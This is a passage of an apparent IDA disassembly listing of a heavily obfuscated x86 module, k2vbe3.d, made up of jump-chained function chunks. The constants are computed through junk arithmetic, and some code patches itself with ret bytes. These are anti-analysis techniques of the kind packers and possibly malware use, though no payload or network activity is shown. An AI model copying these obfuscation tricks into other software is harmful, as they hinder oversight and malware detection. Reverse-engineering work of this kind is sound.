; START	OF FUNCTION CHUNK FOR sub_457960

loc_45A9CF:				; CODE XREF: sub_457960:loc_44497Fj
		xor	eax, 0CAF40399h
		add	eax, ebp
		add	eax, 0AEFE5599h
		mov	[eax], edx
		jmp	loc_44D627
; END OF FUNCTION CHUNK	FOR sub_457960
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_45A9E4:				; CODE XREF: sub_444D7B+12j
		jnz	loc_44DE18
		jmp	loc_45B34B
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4436CE

loc_45A9EF:				; CODE XREF: sub_4436CE+Cj
		mov	eax, offset dword_4411BC
		call	sub_445024
		cmp	ds:dword_4411CC, 0
		jnz	loc_459508
		jmp	loc_45B663
; END OF FUNCTION CHUNK	FOR sub_4436CE

; =============== S U B	R O U T	I N E =======================================



sub_45AA0B	proc near		; DATA XREF: sub_44A8B1o

; FUNCTION CHUNK AT 00449A64 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AEFB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004518CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458AEB SIZE 00000005 BYTES

		jnz	loc_44AEFB
		push	44D5038Fh
		pop	eax
		rol	eax, 6
		sub	eax, 0E7B93E35h
		jmp	loc_44328C
sub_45AA0B	endp


; =============== S U B	R O U T	I N E =======================================



sub_45AA25	proc near		; CODE XREF: sub_445047+1D59p
					; k2vbe3.d:0045BEADj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043EA70 SIZE 0000000E BYTES

		xchg	edx, [esp-4+arg_0]
		pop	edx

loc_45AA29:				; CODE XREF: k2vbe3.d:loc_442F5Ej
		xchg	edx, [esp+0]
		mov	[ebp-4], eax
		call	sub_45BA22

loc_45AA34:				; CODE XREF: sub_446E24-2FCFj
		jmp	loc_43EA70
sub_45AA25	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45AA39:				; CODE XREF: k2vbe3.d:0044223Dj
		jmp	loc_45B944
; ---------------------------------------------------------------------------

loc_45AA3E:				; DATA XREF: k2vbe3.d:00444D4Do
		pop	ebp
		retn

; =============== S U B	R O U T	I N E =======================================



sub_45AA40	proc near		; CODE XREF: sub_445541-74A2j
					; k2vbe3.d:00444D43p ...
		mov	dword ptr [eax], 0
		retn
sub_45AA40	endp

; ---------------------------------------------------------------------------

loc_45AA47:				; CODE XREF: k2vbe3.d:00453599j
		jmp	loc_43D34A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_45AA4C:				; CODE XREF: sub_446E24+3CB1j
		jmp	loc_44A023
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

loc_45AA51:				; CODE XREF: k2vbe3.d:00443CB2j
		jmp	loc_45831A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_19. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_45AA57	proc near		; CODE XREF: sub_44F42B:loc_43C570p
					; sub_453FF1:loc_444AD6p ...

; FUNCTION CHUNK AT 0044868E SIZE 0000000F BYTES

		js	sub_44C6EC
		push	ebp
		jmp	loc_44868E
sub_45AA57	endp


; =============== S U B	R O U T	I N E =======================================



sub_45AA63	proc near		; CODE XREF: k2vbe3.d:0043DE94j
					; sub_44ED3Cp

arg_0		= dword	ptr  4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043FEDB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00443664 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044D585 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454572 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045462F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456929 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004573EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457EF9 SIZE 00000016 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		jb	loc_443664
		pop	edx
		mov	eax, [esp+0]
		jmp	loc_45462F
sub_45AA63	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_45AA76:				; CODE XREF: sub_4460FD+12j
					; k2vbe3.d:00452E08j
		xchg	eax, [esp+0]
		mov	edx, eax
		push	ecx
		push	0A15CE80Bh
		pop	ecx
		sub	ecx, 8D14AF33h
		add	ecx, 0F5E7FC14h
		jmp	loc_44CE61
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
		test	esi, eax
		jmp	loc_443EF0
; ---------------------------------------------------------------------------

loc_45AA9A:				; CODE XREF: k2vbe3.d:00452F11j
		rol	eax, 3
		sub	eax, 0C7EFDCA5h
		add	eax, 29883DBAh
		xchg	eax, [esp]
		jmp	loc_45717F
; ---------------------------------------------------------------------------

locret_45AAB1:				; CODE XREF: k2vbe3.d:loc_43E7FBj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450C26

loc_45AAB2:				; CODE XREF: sub_450C26+9j
		jmp	nullsub_494
; END OF FUNCTION CHUNK	FOR sub_450C26
; ---------------------------------------------------------------------------

locret_45AAB7:				; CODE XREF: k2vbe3.d:loc_45ADA9j
		retn
; ---------------------------------------------------------------------------

loc_45AAB8:				; CODE XREF: k2vbe3.d:00448E46j
		jmp	locret_44B5D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A306

loc_45AABD:				; CODE XREF: sub_44A306:loc_442C74j
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_448A69
		jmp	loc_447C14
; END OF FUNCTION CHUNK	FOR sub_44A306
; ---------------------------------------------------------------------------
		cmp	edi, eax
		jmp	loc_44AB02
; ---------------------------------------------------------------------------
		or	edx, ebx
		jmp	loc_43D7A4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_34. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_45AADB:				; CODE XREF: sub_453347:loc_446131j
		jle	nullsub_310

loc_45AAE1:				; CODE XREF: sub_453347:loc_444077j
		call	sub_44809D

loc_45AAE6:				; CODE XREF: sub_43C04E+19AEFj
		jmp	loc_44F9E5
; END OF FUNCTION CHUNK	FOR sub_453347

; =============== S U B	R O U T	I N E =======================================



sub_45AAEB	proc near		; DATA XREF: sub_44FEF3-6081o

; FUNCTION CHUNK AT 00446432 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A514 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E5F5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044EB4C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C2C0 SIZE 0000000B BYTES

		add	edx, 6F07A528h
		mov	[edx], eax
		pop	edx
		inc	dword ptr [ebp-0Ch]
		jmp	loc_446432
sub_45AAEB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_45AAFC:				; CODE XREF: sub_4582DD-13E66j
		sub	ebx, 21109106h

loc_45AB02:				; CODE XREF: sub_4582DD:loc_441B44j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44C7FD
		jmp	loc_440898
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452ECC

loc_45AB13:				; CODE XREF: sub_452ECC+8BC3j
		mov	byte ptr [eax],	0C3h
		jmp	sub_452ECC
; ---------------------------------------------------------------------------

loc_45AB1B:				; CODE XREF: sub_452ECC+6j
		mov	eax, [esp-4+arg_0]
		push	esi
		mov	esi, edx
		xchg	esi, [esp+0]
		call	sub_454E83
		push	1C844984h
		pop	eax
		jmp	loc_43D2F0
; END OF FUNCTION CHUNK	FOR sub_452ECC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_45AB34:				; CODE XREF: sub_44C1BD+11j
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax
		mov	eax, ds:dword_453CF4
		or	eax, eax
		jnz	loc_44F4E9
		jmp	loc_44C3F3
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------

loc_45AB4D:				; CODE XREF: k2vbe3.d:00451366j
		mov	edx, [eax]
		or	ecx, 0C55D3C6Bh
		jns	loc_455B4E
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_45AB5B:				; CODE XREF: sub_44D0D5:loc_451350j
		add	eax, 0A372A5DDh
		push	edi
		push	0DE63AF55h
		pop	edi
		jmp	loc_442DDA
; END OF FUNCTION CHUNK	FOR sub_44D0D5

; =============== S U B	R O U T	I N E =======================================



sub_45AB6D	proc near		; CODE XREF: k2vbe3.d:004563B7j
					; sub_440C94+1885Bp
		xchg	edi, [esp+0]
		pop	edi
		add	eax, ebp
		add	eax, 51B59CD9h
		jmp	loc_4595AD
sub_45AB6D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45AB7E	proc near		; CODE XREF: k2vbe3.d:loc_43CA7Aj
					; sub_452C21p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043DDD3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043E827 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043EA14 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446C41 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044799C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E7A7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00451C6E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00453E8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BF6B SIZE 0000000B BYTES

		xchg	eax, [esp-4+arg_0]
		mov	edx, eax
		pop	eax
		jnz	loc_44E7A7
		push	offset loc_4591AA
		jmp	loc_446C41
sub_45AB7E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_45AB94:				; CODE XREF: sub_4486D7+4751j
		ja	sub_453FD5

loc_45AB9A:				; CODE XREF: sub_4486D7:loc_44155Aj
		push	edx
		push	0E4326831h
		pop	edx
		sub	edx, 0DAAA3E6Ah
		and	edx, 5164C25h
		or	edx, 6F1C06ECh
		add	edx, 91293E46h
		jmp	loc_459822
; END OF FUNCTION CHUNK	FOR sub_4486D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_45ABBE:				; CODE XREF: sub_4423D2+AD6Cj
		add	edx, 4EA5D93Bh
		xor	edx, 1E168253h
		add	ecx, edx
		pop	edx
		mov	ecx, [ecx]
		jmp	loc_454B41
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45ABD4:				; CODE XREF: sub_45A323+16CCj
		jp	loc_453441
		jmp	loc_457793
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_45ABDF:				; CODE XREF: sub_44DAF6-AB00j
		sub	al, 99h

loc_45ABE1:				; CODE XREF: sub_457D4B-BA57j
		push	0AF7E434Fh
		pop	edx
		sub	edx, 3764A283h
		rol	edx, 4
		and	edx, 0FC0E3349h
		jmp	loc_44174C
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45ABFB:				; CODE XREF: sub_45A323-9E35j
		and	edx, 43D2E941h
		or	edx, esi

loc_45AC03:				; CODE XREF: sub_45A323:loc_446421j
		call	sub_45AA57
		push	37D129AAh
		pop	edx
		or	edx, 19C84C23h
		and	edx, 37E1CBCAh
		cmp	edx, 0FB6F0C97h
		jmp	loc_44106C
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_45AC25:				; CODE XREF: k2vbe3.d:loc_449F37j
		jz	loc_4532CB
		jmp	loc_450FE2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_45AC30:				; CODE XREF: sub_4440E5:loc_43E80Aj
		call	sub_43C04E
		test	al, al
		jz	loc_457C8A
		jmp	loc_44BAC8
; END OF FUNCTION CHUNK	FOR sub_4440E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_45AC42:				; CODE XREF: sub_45B20A:loc_45B210j
		jnz	loc_4497E8

loc_45AC48:				; CODE XREF: k2vbe3.d:00456815j
		jmp	loc_44DEB8
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
		ror	eax, 0Bh

loc_45AC50:				; CODE XREF: k2vbe3.d:loc_443134j
		jmp	loc_4497E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457E9C

loc_45AC55:				; CODE XREF: sub_457E9C-1BADEj
					; k2vbe3.d:0043E710j
		rol	ebx, 6
		xor	ebx, 0D3AB41A1h
		add	ebx, ebp
		jmp	loc_444F8C
; END OF FUNCTION CHUNK	FOR sub_457E9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_45AC65:				; CODE XREF: sub_4468FE:loc_44F34Bj
		xchg	esi, [esp+8+var_8]
		jmp	loc_4484D5
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_45AC6D:				; CODE XREF: sub_4426DF+7757j
		push	offset loc_44C119
		jmp	nullsub_401
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_45AC77:				; CODE XREF: sub_44C90E-50D0j
		jz	loc_44D1C3
		jmp	loc_44F462
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		mov	ds:off_41E078, eax
		lea	eax, sub_4518D8
		mov	byte ptr [eax],	0C3h
		jmp	loc_44EB0C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518D8

loc_45AC96:				; CODE XREF: sub_4518D8+1j
		mov	eax, [esp+0]
		push	edx
		call	sub_44A7C2
		mov	eax, 99B20D50h
		call	sub_4553CC
		jmp	loc_448A64
; END OF FUNCTION CHUNK	FOR sub_4518D8

; =============== S U B	R O U T	I N E =======================================



sub_45ACAE	proc near		; DATA XREF: sub_441409:loc_44A7B1o

; FUNCTION CHUNK AT 0043D41A SIZE 0000001D BYTES

		xor	eax, 0BF9D6F3Eh
		shl	eax, cl
		push	4C1EFC5h
		pop	edx
		xor	edx, 8162A60Bh
		sub	edx, 0A06E0A9Eh
		and	edx, 73A34725h
		xor	edx, 0BB5A5A7Bh
		jmp	loc_43D41A
sub_45ACAE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450359

loc_45ACD9:				; CODE XREF: sub_450359:loc_450372j
		jz	loc_449FF4
		jmp	loc_442A8D
; END OF FUNCTION CHUNK	FOR sub_450359
; ---------------------------------------------------------------------------
dword_45ACE4	dd 1BAh, 1087F000h, 840FD209h, 0FFFF68BFh ; DATA XREF: sub_445024o
; ---------------------------------------------------------------------------

loc_45ACF4:				; CODE XREF: k2vbe3.d:0044A276j
					; k2vbe3.d:0044AFC9j
		jo	loc_442201
		push	eax
		jmp	loc_44A26B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_45AD00:				; CODE XREF: sub_457D4B-BA4Bj
		jns	loc_43C5B7

loc_45AD06:				; CODE XREF: sub_457D4B:loc_450B35j
		push	ecx
		push	82E294F7h
		pop	ecx
		jmp	loc_452988
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_45AD12:				; CODE XREF: sub_454463+23B8j
		or	ebx, 0F34BB59Eh
		pushf

loc_45AD19:				; CODE XREF: k2vbe3.d:loc_445119j
		mov	eax, [esp+8+var_8]
		call	sub_43DA01

loc_45AD21:				; CODE XREF: k2vbe3.d:0045012Bj
					; sub_452B1A:loc_452B20j
		xchg	eax, [esp+8+var_8]
		mov	edx, eax
		call	sub_45B74D

loc_45AD2B:				; CODE XREF: sub_4448E9+93ABj
		jmp	loc_44BC98
; END OF FUNCTION CHUNK	FOR sub_454463
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_45AD30:				; CODE XREF: sub_44660F:loc_450E17j
		mov	edx, [ebp+var_4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43F6FF
		jmp	loc_440BE2
; END OF FUNCTION CHUNK	FOR sub_44660F

; =============== S U B	R O U T	I N E =======================================



sub_45AD42	proc near		; DATA XREF: sub_451EB7+A3FFo

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043D49F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D62D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043E7BB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044198C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442CF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004441A0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004447E6 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00444889 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00444D9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004455E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004471FB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044986C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B003 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044BB32 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004515A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004519EE SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045207E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00452BFA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004556BA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455879 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00457884 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00458B2A SIZE 00000008 BYTES

		push	ecx
		push	0C076CBCFh
		pop	ecx
		and	ecx, 6AB5913Ah
		sub	ecx, 0A9B6BBDAh
		or	ecx, 0CE40BB91h
		jmp	loc_442CF0
sub_45AD42	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_45AD60:				; CODE XREF: sub_457D4B-AC36j
					; k2vbe3.d:loc_44EA26j
		xor	eax, 0F3F8DE18h
		add	eax, ebp
		add	eax, 1D0721DCh
		mov	eax, [eax]
		push	edi

loc_45AD71:				; CODE XREF: sub_454E69:loc_44818Ej
		mov	edi, eax
		xchg	edi, [esp-4+arg_0]
		call	sub_45A323
		jmp	loc_444C5F
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------

loc_45AD80:				; CODE XREF: k2vbe3.d:00446295j
		jge	loc_44A82B

loc_45AD86:				; CODE XREF: k2vbe3.d:00442ECEj
		jmp	locret_444C7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_45AD8B:				; CODE XREF: sub_45B74D-1B366j
		jmp	loc_444CEB
; END OF FUNCTION CHUNK	FOR sub_45B74D
; ---------------------------------------------------------------------------
		mov	ebp, ebx
		jo	loc_454958
		cdq
		jmp	loc_44A829
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45775D

loc_45AD9E:				; CODE XREF: sub_45775D:loc_456B62j
		jl	loc_44492C
; END OF FUNCTION CHUNK	FOR sub_45775D
; START	OF FUNCTION CHUNK FOR sub_448E56

loc_45ADA4:				; CODE XREF: sub_448E56+Aj
		jmp	loc_44FCA0
; END OF FUNCTION CHUNK	FOR sub_448E56
; ---------------------------------------------------------------------------

loc_45ADA9:				; CODE XREF: k2vbe3.d:0044732Fj
		jmp	locret_45AAB7
; ---------------------------------------------------------------------------
		rol	ebx, 0Dh
		jmp	loc_44492A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FBB2

loc_45ADB6:				; CODE XREF: sub_44FBB2+ADDBj
		pop	ecx
		pop	edx
		pop	ebp
		jmp	loc_43CE62
; END OF FUNCTION CHUNK	FOR sub_44FBB2
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		jmp	loc_44A046
; ---------------------------------------------------------------------------
		cmp	ecx, 3B6DC1DDh
		jmp	loc_459518
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF14

loc_45ADD1:				; CODE XREF: sub_44CF14:loc_43EF04j
		pop	eax
		xor	eax, 0F6DAECCEh
		add	eax, 6BDDD38Fh
		xchg	eax, [esp+0Ch+var_C]
		jmp	sub_453FF1
; END OF FUNCTION CHUNK	FOR sub_44CF14
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_57. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45ADE7:				; CODE XREF: k2vbe3.d:0045396Aj
		and	ecx, 23C8D8E0h

; =============== S U B	R O U T	I N E =======================================



sub_45ADED	proc near		; CODE XREF: k2vbe3.d:0044830Dp

; FUNCTION CHUNK AT 00446E96 SIZE 00000006 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edi
		jmp	loc_446E96
sub_45ADED	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45ADF7:				; CODE XREF: k2vbe3.d:00456623j
		sub	esi, ds:4000EDh
		add	esi, 2CD77C52h
		add	esi, ebp
		add	esi, 27B29F80h
		mov	[esi], eax
		pop	esi
		jmp	loc_43F2AD
; ---------------------------------------------------------------------------

loc_45AE13:				; CODE XREF: k2vbe3.d:loc_457039j
		rol	esi, 13h
		xor	esi, 74172701h
		test	esi, 800h
		jmp	loc_45B346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_45AE27:				; CODE XREF: sub_44A6BD:loc_447487j
		adc	eax, edx
		jmp	loc_44C126
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_45AE2E:				; CODE XREF: sub_4468FE-35F2j
		push	5E828BECh
		pop	esi
		sub	esi, 0EC608BF1h
		rol	esi, 4
		add	esi, 0DE242FEBh
		jmp	loc_44F34B
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------

loc_45AE48:				; CODE XREF: k2vbe3.d:loc_447C5Cj
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		mov	eax, edx
		jmp	loc_44C5C2
; ---------------------------------------------------------------------------
		mov	[ebp+0], ebx
		jmp	loc_44F969
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D244

loc_45AE5D:				; CODE XREF: sub_43D244:loc_45A176j
		add	edx, 209A3E51h
		add	edx, ebp
		push	offset sub_43E7A9
		jmp	loc_452372
; END OF FUNCTION CHUNK	FOR sub_43D244
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450983

loc_45AE6F:				; CODE XREF: sub_450983-14344j
					; sub_450983:loc_443D34j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43DAB0
		jmp	loc_4436DF
; END OF FUNCTION CHUNK	FOR sub_450983
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_45AE80:				; CODE XREF: sub_44DD31:loc_44E67Fj
		cdq
		js	loc_45B691
		jmp	loc_4454C4
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------

loc_45AE8C:				; CODE XREF: k2vbe3.d:0044129Cj
		adc	ebx, edi

; =============== S U B	R O U T	I N E =======================================



sub_45AE8E	proc near		; CODE XREF: sub_44D2F1:loc_45B534p
		xchg	esi, [esp+0]
		pop	esi
		ror	eax, 0Dh
		mov	ds:dword_444F3C, eax
		retn
sub_45AE8E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_45AE9C:				; CODE XREF: sub_4423D2+Cj
					; sub_44D2F1+9j
		call	sub_455F48

loc_45AEA1:				; DATA XREF: sub_454EBB:loc_453D5Bo
		push	0D9A4FF31h
		pop	ecx
		xor	ecx, ds:4000F0h
		and	ecx, 22AD8C4Eh
		add	ecx, 4691F040h
		test	ecx, 8000h
		jmp	loc_43E5EC
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DAF

loc_45AEC4:				; CODE XREF: sub_458DAF-1D8j
		jl	loc_45467D
; END OF FUNCTION CHUNK	FOR sub_458DAF
; START	OF FUNCTION CHUNK FOR sub_441A09

loc_45AECA:				; CODE XREF: sub_441A09+15D1Fj
		jmp	loc_456150
; END OF FUNCTION CHUNK	FOR sub_441A09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_45AECF:				; CODE XREF: sub_454AD4-41A9j
		jmp	sub_4512B9
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
		not	ebp
		mov	[esi], ecx
		jmp	loc_45467D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500BB

loc_45AEDD:				; CODE XREF: sub_4500BB-8D49j
		push	78388EDEh
		pop	edx
		and	edx, 0F7C0C36Ch
		xor	edx, 572ECA96h
		add	edx, 4019ADBFh
		xor	edx, 0D8638AA1h
		add	edx, ebp
		push	eax
		jmp	loc_443E5A
; END OF FUNCTION CHUNK	FOR sub_4500BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_45AF03:				; CODE XREF: sub_457DCA:loc_4495CEj
		jle	loc_4469CA
		jmp	loc_440F3C
; END OF FUNCTION CHUNK	FOR sub_457DCA

; =============== S U B	R O U T	I N E =======================================



sub_45AF0E	proc near		; CODE XREF: sub_43F7AC+15529p
					; k2vbe3.d:004585A3j

; FUNCTION CHUNK AT 0043C000 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044E83C SIZE 0000001C BYTES

		xchg	eax, [esp+0]
		pop	eax
		cmp	ds:dword_444F20, 0
		jnz	loc_44E846
		call	nullsub_1
		call	sub_4436CE
		mov	edx, 0CF0182F6h
		jmp	loc_44E83C
sub_45AF0E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_45AF33:				; CODE XREF: sub_44CA34-B0E5j
		shr	ecx, 8
		pop	ecx

loc_45AF37:				; CODE XREF: sub_44CA34:loc_43FDFFj
		mov	eax, 1F56AC7Bh
		call	sub_4553CC
		rol	eax, 5
		xor	eax, 72962172h
		call	sub_44F614
; END OF FUNCTION CHUNK	FOR sub_44CA34
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_45AF4F:				; CODE XREF: sub_43F7AC+19DC9j
		jmp	loc_44BE1A
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_45AF54:				; CODE XREF: sub_4426DF+13C9Bj
		jmp	loc_449E30
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C745

loc_45AF59:				; CODE XREF: sub_43C745:loc_45A10Cj
		add	eax, 3720C916h
		rol	eax, 1Bh

loc_45AF62:				; CODE XREF: sub_454903:loc_440EBCj
		push	ecx
		push	0F9B32B78h
		pop	ecx
		jmp	loc_44DB71
; END OF FUNCTION CHUNK	FOR sub_43C745
; ---------------------------------------------------------------------------
		sbb	ecx, edx
		jmp	loc_43C6FD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_381. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4502BA

loc_45AF76:				; CODE XREF: sub_4502BA+Bj
		jmp	loc_4443C4
; END OF FUNCTION CHUNK	FOR sub_4502BA
; ---------------------------------------------------------------------------

loc_45AF7B:				; DATA XREF: sub_442DDF:loc_44D6ADo
		push	0D0105F8Ch
		pop	eax
		xor	eax, 4D58FD98h
		jnz	loc_43F985
; START	OF FUNCTION CHUNK FOR sub_45496E

loc_45AF8D:				; CODE XREF: sub_45496E+Dj
		jmp	loc_451ED0
; END OF FUNCTION CHUNK	FOR sub_45496E
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_43F983
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440E71

loc_45AF98:				; CODE XREF: sub_440E71:loc_441286j
		xor	eax, 871B08C4h
; END OF FUNCTION CHUNK	FOR sub_440E71
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_45AF9E:				; CODE XREF: sub_455C7A:loc_447748j
		rol	eax, 0Ah
		xor	eax, 0CE0554FAh
		sub	eax, 649B22ABh
		xor	eax, 50217553h
		mov	ds:dword_458F08, eax
; END OF FUNCTION CHUNK	FOR sub_455C7A
; START	OF FUNCTION CHUNK FOR sub_451222

